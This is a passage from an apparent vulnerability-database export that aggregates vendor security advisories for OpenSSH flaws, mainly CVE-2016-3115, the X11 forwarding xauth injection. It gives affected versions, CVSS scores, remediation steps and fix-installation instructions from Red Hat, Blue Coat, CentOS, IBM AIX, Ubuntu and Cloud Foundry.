possibly use this flaw to bypass intended\nrestrictions. (CVE-2016-3115)\n\nIt was discovered that the OpenSSH sshd daemon did not check the list of\nkeyboard-interactive authentication methods for duplicates. A remote\nattacker could use this flaw to bypass the MaxAuthTries limit, making it\neasier to perform password guessing attacks. 
(CVE-2015-5600)\n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically.\n", "modified": "2018-06-06T20:24:20", "published": "2016-03-21T04:00:00", "id": "RHSA-2016:0466", "href": "https://access.redhat.com/errata/RHSA-2016:0466", "type": "redhat", "title": "(RHSA-2016:0466) Moderate: openssh security update", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2019-08-13T18:46:50", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1908", "CVE-2016-3115"], "description": "OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation.\nThese packages include the core files necessary for both the OpenSSH client\nand server.\n\nIt was discovered that the OpenSSH server did not sanitize data received\nin requests to enable X11 forwarding. An authenticated client with\nrestricted SSH access could possibly use this flaw to bypass intended\nrestrictions. (CVE-2016-3115)\n\nAn access flaw was discovered in OpenSSH; the OpenSSH client did not\ncorrectly handle failures to generate authentication cookies for untrusted\nX11 forwarding. A malicious or compromised remote X application could\npossibly use this flaw to establish a trusted connection to the local X\nserver, even if only untrusted X11 forwarding was requested.\n(CVE-2016-1908)\n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically.", "modified": "2018-04-12T03:32:38", "published": "2016-03-22T00:03:21", "id": "RHSA-2016:0465", "href": "https://access.redhat.com/errata/RHSA-2016:0465", "type": "redhat", "title": "(RHSA-2016:0465) Moderate: openssh security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2020-12-24T10:41:33", "bulletinFamily": "software", "cvelist": ["CVE-2015-3115", "CVE-2016-3115"], "description": "### SUMMARY\n\nBlue Coat products that include vulnerable versions of OpenSSH and enable X11 forwarding are susceptible to a command injection vulnerability due to insufficient input data sanitization. An authenticated remote attacker can exploit this vulnerability to bypass intended command restrictions enforced by a restricted shell or the target's SSH configuration. The attacker can also execute arbitrary commands. \n \n\n\n### AFFECTED PRODUCTS\n\n**Norman Shark Industrial Control System Protection (ICSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 5.4 and later | Not vulnerable, fixed in 5.4.1 \n5.3 | Upgrade to 5.3.6. \n \n \n\n**Norman Shark Network Protection (NNP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 5.3 | Upgrade to 5.3.6. \n \n \n\n**Norman Shark SCADA Protection (NSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 5.3 | Upgrade to 5.3.6. \n \n \n\n The following products contain a vulnerable version of OpenSSH, but are not vulnerable to known vectors of attack:\n\n**Advanced Secure Gateway (ASG)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 \n | 6.7 and later | Not vulnerable, fixed in 6.7.2.1. \n6.6 | Upgrade to 6.6.5.1. 
\n \n \n\n**Content Analysis System (CAS)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 \n \n | 2.1 and later | Not vulnerable \n1.3 | Upgrade to 1.3.7.1. \n1.2 | Upgrade to later releases with fixes. \n \n \n\n**Director** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 6.1 | Upgrade to 6.1.23.1. \n \n \n\n**Mail Threat Defense (MTD)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 1.1 | Upgrade to 1.1.2.1. \n \n \n\n**Malware Analysis Appliance (MAA)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 4.2 | Upgrade to 4.2.10. \n \n \n\n**Management Center (MC)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 \n | 1.6 and later | Not vulnerable, fixed in 1.6.1.1 \n1.5 | Upgrade to later releases with fixes. \n \n \n\n**PacketShaper (PS)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 9.2 | Fixed in 9.2.13p7 \n \n \n\n**PacketShaper (PS) S-Series** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 \n \n | 11.6 and later | Not vulnerable, fixed in 11.6.1.1 \n11.5 | Upgrade to 11.5.3.2. \n11.2, 11.3, 11.4 | Upgrade to later releases with fixes. \n \n \n\n**PolicyCenter (PC) S-Series** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 1.1 | Upgrade to 1.1.2.2. \n \n \n\n**Reporter** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 10.2 and later | Not vulnerable, fixed in 10.2.1.1 \n10.1 | Upgrade to 10.1.4.2. \n \n \n \n\n**Security Analytics** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 7.2 and later | Not vulnerable, fixed in 7.2.1 \n7.1 | Apply RPM patch from Blue Coat Support. \n7.0 | Upgrade to later releases with fixes. \n6.6 | Apply RPM patch from Blue Coat Support. 
\n \n \n\n**SSL Visibility (SSLV)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 \n \n | 3.10 and later | Not vulnerable, fixed in 3.10.1.1 \n3.9 | Upgrade to 3.9.4.1. \n3.8, 3.8.4FC | Upgrade to later releases with fixes. \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 11.0 | Not available at this time \n10.0 | Upgrade to later release with fixes. \n9.7 | Upgrade to later release with fixes. \n \n \n\n### ADDITIONAL PRODUCT INFORMATION\n\nBlue Coat products do not enable or use all functionality within OpenSSH. The products listed below do not support X11 forwarding and are thus not known to be vulnerable. However, OpenSSH patches will be provided.\n\n * ASG\n * CAS\n * Director\n * MTD\n * MAA\n * MC\n * PacketShaper\n * PacketShaper S-Series\n * PolicyCenter S-Series\n * Reporter\n * Security Analytics\n * SSLV\n * XOS\n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nBlue Coat HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nPolicyCenter \nProxyClient \nProxyAV \nProxyAV ConLog and ConLogXP \nProxySG \nUnified Agent \nWeb Isolation**\n\nBlue Coat no longer provides vulnerability information for the following products:\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP. 
\n \n\n### ISSUES\n\nThis Security Advisory addresses a shell command restriction bypass vulnerability when X11 forwarding is enabled in OpenSSH server (CVE-2016-3115). Blue Coat products that include a vulnerable version of OpenSSH and use the affected functionality are vulnerable.\n\nWhen establishing an X11 forwarding session, the SSH client sends an X11 authentication credential to the SSH server. The credential consists of an authentication scheme and credential data. The SSH server passes the credential components as command line arguments to the xauth utility, which stores them in an X11 authorization file. Affected versions of OpenSSH do not sufficiently sanitize the credential components before invoking xauth with them. A remote attacker can exploit this vulnerability by acting as an SSH client and sending crafted credential components to inject arbitrary commands into xauth. The attacker can use xauth commands to read and overwrite arbitrary files, connect to local ports on the target, and perform attacks against xauth.\n\n**CVE-2016-3115** \n--- \n**Severity / CVSSv2** | Medium / 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N) \n**References** | SecurityFocus: BID [84314](<https://www.securityfocus.com/bid/84314>) / NVD: [CVE-2016-3115](<https://nvd.nist.gov/vuln/detail/CVE-2016-3115>) \n**Impact** | Security bypass \n**Description** | An authenticated remote attacker can exploit this vulnerability to bypass intended command restrictions enforced by a restricted shell or the target's SSH configuration. \n \n \n\n### REFERENCES\n\nOpenSSH security advisory - <https://www.openssh.com/txt/x11fwd.adv> \n \n\n\n### REVISION\n\n2020-04-21 Advisory status changes to Closed. \n2019-10-02 Web Isolation is not vulnerable. \n2018-07-01 A fix for PacketShaper 9.2 is available in 9.2.13p7. \n2018-04-22 PacketShaper S-Series 11.10 is not vulnerable. \n2017-11-06 ASG 6.7 is not vulnerable because a fix is available in 6.7.2.1. \n2017-08-02 SSLV 4.1 is not vulnerable. 
\n2017-07-24 PacketShaper S-Series 11.9 is not vulnerable. \n2017-07-20 MC 1.10 is not vulnerable. \n2017-06-22 Security Analytics 7.3 is not vulnerable. \n2017-06-05 PacketShaper S-Series 11.8 is not vulnerable. \n2017-05-29 SSLV 4.0 is not vulnerable. \n2017-05-18 CAS 2.1 is not vulnerable. \n2017-04-30 A fix for Director 6.1 is available in 6.1.23.1. \n2017-03-30 MC 1.9 is not vulnerable. \n2017-03-06 MC 1.8 is not vulnerable. Vulnerability inquiries for DLP should be addressed to Digital Guardian technical support. \n2016-12-04 PacketShaper S-Series 11.7 is not vulnerable. \n2016-12-04 SSLV 3.11 is not vulnerable. \n2016-11-17 Cloud Data Protection for Oracle Field Service Cloud is not vulnerable. \n2016-11-11 SSLV 3.10 is not vulnerable. \n2016-10-26 A fix for ASG is available in 6.6.5.1. A fix for MAA is available in 4.2.10. A fix for Reporter 10.1 is available in 10.1.4.2. A fix for MC 1.6 is available in 1.6.1.1. MC 1.7 is not vulnerable. A fix for MC 1.5 will not be provided. \n2016-08-12 A fix for CAS 1.3 is available in 1.3.7.1. Security Analytics 7.2 is not vulnerable. \n2016-08-10 A fix for SSLV 3.9 is available in 3.9.4.1. \n2016-06-30 PacketShaper S-Series 11.6 is not vulnerable. \n2016-06-24 A fix for PacketShaper S-Series is available in 11.5.3.2. A fix for PolicyCenter S-Series is available in 1.1.2.2. \n2016-06-16 PS S-Series 11.2, 11.3, 11.4, and 11.5 have a vulnerable version of OpenSSH, but are not vulnerable to known vectors of attack. PC S-Series 1.1 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. Fixes are not available at this time. \n2016-06-13 Fixes for ICSP, NNP, and NSP are available in 5.3.6. \n2016-05-26 Fixes are available for Security Analytics 6.6 and 7.1 through patch RPMs from Blue Coat Support. \n2016-05-11 No Cloud Data Protection products are vulnerable. 
\n2016-04-28 initial public release\n", "modified": "2020-04-21T22:19:53", "published": "2016-04-28T08:00:00", "id": "SMNTC-1361", "href": "", "type": "symantec", "title": "SA121 : OpenSSH Shell Command Restriction Bypass", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "centos": [{"lastseen": "2019-12-20T18:28:43", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5600", "CVE-2016-3115"], "description": "**CentOS Errata and Security Advisory** CESA-2016:0466\n\n\nOpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation.\nThese packages include the core files necessary for both the OpenSSH client\nand server.\n\nIt was discovered that the OpenSSH server did not sanitize data received\nin requests to enable X11 forwarding. An authenticated client with\nrestricted SSH access could possibly use this flaw to bypass intended\nrestrictions. (CVE-2016-3115)\n\nIt was discovered that the OpenSSH sshd daemon did not check the list of\nkeyboard-interactive authentication methods for duplicates. A remote\nattacker could use this flaw to bypass the MaxAuthTries limit, making it\neasier to perform password guessing attacks. (CVE-2015-5600)\n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-March/033783.html\n\n**Affected packages:**\nopenssh\nopenssh-askpass\nopenssh-clients\nopenssh-ldap\nopenssh-server\npam_ssh_agent_auth\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-0466.html", "edition": 3, "modified": "2016-03-21T22:18:29", "published": "2016-03-21T22:18:29", "href": "http://lists.centos.org/pipermail/centos-announce/2016-March/033783.html", "id": "CESA-2016:0466", "title": "openssh, pam_ssh_agent_auth security update", "type": "centos", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2019-12-20T18:28:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1908", "CVE-2016-3115"], "description": "**CentOS Errata and Security Advisory** CESA-2016:0465\n\n\nOpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation.\nThese packages include the core files necessary for both the OpenSSH client\nand server.\n\nIt was discovered that the OpenSSH server did not sanitize data received\nin requests to enable X11 forwarding. An authenticated client with\nrestricted SSH access could possibly use this flaw to bypass intended\nrestrictions. (CVE-2016-3115)\n\nAn access flaw was discovered in OpenSSH; the OpenSSH client did not\ncorrectly handle failures to generate authentication cookies for untrusted\nX11 forwarding. A malicious or compromised remote X application could\npossibly use this flaw to establish a trusted connection to the local X\nserver, even if only untrusted X11 forwarding was requested.\n(CVE-2016-1908)\n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-March/033784.html\n\n**Affected packages:**\nopenssh\nopenssh-askpass\nopenssh-clients\nopenssh-keycat\nopenssh-ldap\nopenssh-server\nopenssh-server-sysvinit\npam_ssh_agent_auth\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-0465.html", "edition": 3, "modified": "2016-03-21T22:38:14", "published": "2016-03-21T22:38:14", "href": "http://lists.centos.org/pipermail/centos-announce/2016-March/033784.html", "id": "CESA-2016:0465", "title": "openssh, pam_ssh_agent_auth security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "aix": [{"lastseen": "2019-05-29T19:19:13", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1908", "CVE-2016-3115"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Tue May 3 10:03:39 CDT 2016 \n|Updated: Fri May 13 09:51:05 CDT 2016 \n|Update: New iFixes now available. \n\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/openssh_advisory8.asc\nhttps://aix.software.ibm.com/aix/efixes/security/openssh_advisory8.asc\nftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory8.asc\n\nSecurity Bulletin: Vulnerabilities in OpenSSH affect AIX (CVE-2016-3115 and\n CVE-2016-1908)\n \n \n===============================================================================\n\nSUMMARY:\n\n Vulnerabilities in OpenSSH affect AIX \n \n \n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2016-3115\n DESCRIPTION: OpenSSH could allow a remote authenticated attacker to\n execute arbitrary commands on the system, caused by improper\n validation of user-supplied X11 authentication credentials by the sshd\n server. 
By sending specially crafted X11 credential data, an attacker\n could exploit this vulnerability to inject xauth commands and execute\n arbitrary commands on the system with the privileges of the victim. \n CVSS Base Score: 8.8 \n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/111431 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n \n CVEID: CVE-2016-1908\n DESCRIPTION: OpenSSH could allow a remote authenticated attacker to bypass\n security restrictions, caused by the improper handling of errors when\n generating authentication cookies for untrusted X11 forwarding. An\n attacker could exploit this vulnerability to gain access to the target\n local X server. \n CVSS Base Score: 4.3 \n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/110030 for the\n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n AFFECTED PRODUCTS AND VERSION:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2.x\n \n The following fileset levels are vulnerable:\n \n key_fileset = osrcaix\n \n Fileset Lower Level Upper Level KEY\n -------------------------------------------------------------\n openssh.base.client 4.0.0.5200 6.0.0.6201 key_w_fs\n openssh.base.server 4.0.0.5200 6.0.0.6201 key_w_fs\n \n Note: To determine if your system is vulnerable, execute the\n following commands:\n\n lslpp -L | grep -i openssh.base.client\n lslpp -L | grep -i openssh.base.server\n\n \n REMEDIATION:\n\n A. FIXES\n\n Fixes are available. 
The fixes can be downloaded via ftp and\n http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/openssh_fix8.tar\n http://aix.software.ibm.com/aix/efixes/security/openssh_fix8.tar\n https://aix.software.ibm.com/aix/efixes/security/openssh_fix8.tar\n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n releases.\n\n Note that the tar file contains Interim fixes that are based on\n OpenSSH version as given below - \n\n You must be on the 'prereq for installation' level before\n applying the interim fix. This may require installing a new\n level(prereq version) first.\n \n AIX OpenSSH fixes are cumulative, so installing the latest fixes\n will cover previously released AIX security bulletins for\n OpenSSH. \n\n AIX Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n --------------------------------------------------------------------------------------------\n| 5.3, 6.1, 7.1, 7.2 IV84698m9b.160513.epkg.Z openssh.base(6.0.0.6110 version) key_w_fix\n| 5.3, 6.1, 7.1, 7.2 IV84698m9a.160513.epkg.Z openssh.base(6.0.0.6201 version) key_w_fix\n\n VIOS Level Interim Fix (*.Z)\t Fileset Name(prereq for installation) KEY\n ----------------------------------------------------------------------------------------\n| 2.2.* IV84698m9b.160513.epkg.Z openssh.base(6.0.0.6110 version) key_w_fix\n| 2.2.* IV84698m9a.160513.epkg.Z openssh.base(6.0.0.6201 version) key_w_fix\n\n\n| The above fixes are cumulative and contain fixes for all\n| previously announced OpenSSH security vulnerabilities on\n| AIX.\n\n| The ssh connection hang is specifically seen in scenarios\n| when ssh is used with pseudo tty. 
The login will succeed\n| but later connections get hanged.\n\n Note - OpenSSH releases 6.0.0.6110 and 6.0.0.6201 are same\n except that 6.0.0.6201 is compiled with OpenSSL v1.0.1 and\n contains ECDSA key support. Refer to the fileset readme file for\n more details.\n \n Latest level of OpenSSH fileset is available from the web download site:\n https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=aixbp&lang=en_US&S_PKG=openssh&cp=UTF-8\n\n OpenSSH 6.0.0.6201 version is also part of AIX Service pack: \n 6100-09-06-1543, that was released in Dec. 2015.\n \n To extract the fix from the tar file:\n\n tar xvf openssh_fix8.tar\n cd openssh_fix8\n\n Verify you have retrieved the fix intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command is the followng:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n| 933ac42222856c63beae729fce8ea3f94a428904a622e5395e6df4dc2b8d41b2 IV84698m9b.160513.epkg.Z key_w_csum\n| 974370174695d0be3f65baa87be7bca6238d7d980531c21c50348c6f8ee25121 IV84698m9a.160513.epkg.Z key_w_csum\n \n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the integrity\n of the fixes. If the sums or signatures cannot be confirmed,\n contact IBM AIX Security at security-alert@austin.ibm.com and\n describe the discrepancy.\n \n Published advisory OpenSSL signature file location:\n\n http://aix.software.ibm.com/aix/efixes/security/openssh_advisory8.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/openssh_advisory8.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory8.asc.sig \n\n openssl dgst -sha1 -verify <pubkey_file> -signature\n <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature\n <ifix_file>.sig <ifix_file>\n\n \n B. 
FIX AND INTERIM FIX INSTALLATION\n\n After applying fix, IBM recommends that you regenerate your SSH keys as\n a precaution. \n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n\n WORKAROUNDS AND MITIGATIONS:\n \n None.\n \n \n===============================================================================\n\nCONTACT US:\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX 
Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\nhttp://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n eServer is a trademark of International Business Machines\n Corporation. IBM, AIX and pSeries are registered trademarks of\n International Business Machines Corporation. All other trademarks\n are property of their respective holders.\n\n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n\n X-Force Vulnerability Database:\n https://exchange.xforce.ibmcloud.com/vulnerabilities/111431\n X-Force Vulnerability Database:\n https://exchange.xforce.ibmcloud.com/vulnerabilities/110030\n CVE-2016-3115:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3115\n CVE-2016-1908:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1908\n \n\nACKNOWLEDGEMENTS:\n\n None\n \n \nCHANGE HISTORY:\n\n First Issued: Tue May 3 10:03:39 CDT 2016 \n Updated: Tue May 10 11:23:23 CDT 2016\n Update: Temporarily removing fixes due to a potential hanging issue\n introduced by the fixes. Updated fixes will be live within 24 hours.\n Updated: Thu May 12 10:42:22 CDT 2016\n Update: Temporarily removing fixes due to a potential hanging issue\n introduced by the fixes. Updated fixes will be live on May 13.\n| Updated: Fri May 13 09:51:05 CDT 2016\n| Update: New iFixes now available.\n\n\n===============================================================================\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. 
Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n\n", "edition": 5, "modified": "2016-05-13T09:51:05", "published": "2016-05-03T10:03:39", "id": "OPENSSH_ADVISORY8.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/openssh_advisory8.asc", "title": "Vulnerabilities in OpenSSH affect AIX", "type": "aix", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:33:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1908", "CVE-2015-8325", "CVE-2016-1907", "CVE-2016-3115"], "description": "Shayan Sadigh discovered that OpenSSH incorrectly handled environment files \nwhen the UseLogin feature is enabled. A local attacker could use this issue \nto gain privileges. (CVE-2015-8325)\n\nBen Hawkes discovered that OpenSSH incorrectly handled certain network \ntraffic. A remote attacker could possibly use this issue to cause OpenSSH \nto crash, resulting in a denial of service. This issue only applied to \nUbuntu 15.10. (CVE-2016-1907)\n\nThomas Hoger discovered that OpenSSH incorrectly handled untrusted X11 \nforwarding when the SECURITY extension is disabled. A connection configured \nas being untrusted could get switched to trusted in certain scenarios, \ncontrary to expectations. (CVE-2016-1908)\n\nIt was discovered that OpenSSH incorrectly handled certain X11 forwarding \ndata. 
A remote authenticated attacker could possibly use this issue to \nbypass certain intended command restrictions. (CVE-2016-3115)", "edition": 5, "modified": "2016-05-09T00:00:00", "published": "2016-05-09T00:00:00", "id": "USN-2966-1", "href": "https://ubuntu.com/security/notices/USN-2966-1", "title": "OpenSSH vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:58", "bulletinFamily": "software", "cvelist": ["CVE-2016-1908", "CVE-2015-8325", "CVE-2016-1907", "CVE-2016-3115"], "description": "USN-2966-1 OpenSSH vulnerabilities\n\n# \n\nLow\n\n# Vendor\n\nCanonical Ubuntu, openssh\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04 LTS \n\n# Description\n\nShayan Sadigh discovered that OpenSSH incorrectly handled environment files when the UseLogin feature is enabled. A local attacker could use this issue to gain privileges. ([CVE-2015-8325](<http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-8325.html>))\n\nBen Hawkes discovered that OpenSSH incorrectly handled certain network traffic. A remote attacker could possibly use this issue to cause OpenSSH to crash, resulting in a denial of service. This issue only applied to Ubuntu 15.10. ([CVE-2016-1907](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-1907.html>))\n\nThomas Hoger discovered that OpenSSH incorrectly handled untrusted X11 forwarding when the SECURITY extension is disabled. A connection configured as being untrusted could get switched to trusted in certain scenarios, contrary to expectations. ([CVE-2016-1908](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-1908.html>))\n\nIt was discovered that OpenSSH incorrectly handled certain X11 forwarding data. A remote authenticated attacker could possibly use this issue to bypass certain intended command restrictions. 
([CVE-2016-3115](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3115.html>))\n\n# Affected Products and Versions\n\n_Severity is low unless otherwise noted. \n_\n\n * All versions of Cloud Foundry cflinuxfs2 prior to v.1.56.0 \n * Cloud Foundry BOSH stemcells 3146.x versions prior to 3146.12 AND other versions prior to 3232.4 are vulnerable \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 v.1.56.0 or later versions \n * The Cloud Foundry project recommends that Cloud Foundry upgrade BOSH stemcell 3146.x versions to 3146.12 OR other versions to 3232.4 \n\n# Credit\n\nBen Hawkes, Thomas Hoger, Shayan Sadigh\n\n# References\n\n * <http://www.ubuntu.com/usn/usn-2966-1/>\n * <http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-8325.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-1907.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-1908.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3115.html>\n", "edition": 5, "modified": "2016-06-13T00:00:00", "published": "2016-06-13T00:00:00", "id": "CFOUNDRY:782597A83B98B15285C8A73B8555B7B2", "href": "https://www.cloudfoundry.org/blog/usn-2966-1/", "title": "USN-2966-1 OpenSSH vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-12-07T12:54:24", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1908", "CVE-2015-8325", "CVE-2016-3115", "CVE-2016-6210", "CVE-2016-8858"], "edition": 1, "description": "### Background\n\nOpenSSH is a complete SSH protocol implementation that includes SFTP client and server support. \n\n### Description\n\nMultiple vulnerabilities have been discovered in OpenSSH. Please review the CVE identifiers referenced below for details. 
